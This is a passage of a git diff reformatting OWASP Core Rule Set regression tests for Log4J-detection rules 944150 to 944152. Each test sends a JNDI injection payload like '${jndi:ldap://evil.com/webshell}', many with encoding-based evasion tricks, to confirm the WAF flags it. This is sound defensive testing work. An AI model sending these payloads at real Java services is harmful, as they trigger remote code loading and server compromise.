dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944150" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 71a8e0235..9a57d7419 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -3,454 +3,428 @@ # 944151 should detect the same things as 944151. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944151.yaml" description: "Description" +rule_id: 944151 tests: - - test_title: 944151-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944151" + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944151" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index e88f83f63..17d937eef 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml @@ -3,472 +3,445 @@ # 944152 should detect the same things as 944152 and 944151. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944152.yaml" description: "Description" +rule_id: 944152 tests: - - test_title: 944152-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" 